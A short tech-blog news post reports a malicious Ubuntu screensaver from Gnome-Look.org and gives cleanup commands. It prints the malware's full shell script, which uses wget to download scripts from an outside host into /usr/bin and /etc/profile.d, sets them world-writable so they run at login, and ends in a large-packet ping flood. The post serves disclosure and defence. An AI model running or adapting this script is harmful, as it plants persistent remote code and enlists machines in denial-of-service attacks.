Ubuntu: Malware in Screensaver from Gnome-Look.org

A desktop screensaver available from Gnome-Look.org was reported to be a malware, which downloads an unauthorized script. This script is believed to enable a possible DDoS attack.   The screensaver has been immediately removed from the website after the malware was confirmed at this thread at Ubuntu forums.

The malware posing as a screensaver has a script:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

The ultimate result of this command is:

ping -s 65507 www.mmowned.com

This seems harmless. Also, the site in question [ www.mmowned.com ] advertises protection against DOS attacks. This can be a good prank revenge on the company or, this can be a part of something big by making all these affected computers into bots.

If you have already installed the screensaver, remove it and protect your computer by issuing the commands:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash
and
sudo dpkg -r app5552

[ Via OMG! UBUNTU! ]

Published by

Chinmoy Kanjilal

Chinmoy Kanjilal is a FOSS enthusiast and evangelist. He is passionate about Android. Security exploits turn him on and he loves to tinker with computer networks. He rants occasionally at Techarraz.com. You can connect with him on Twitter @ckandroid.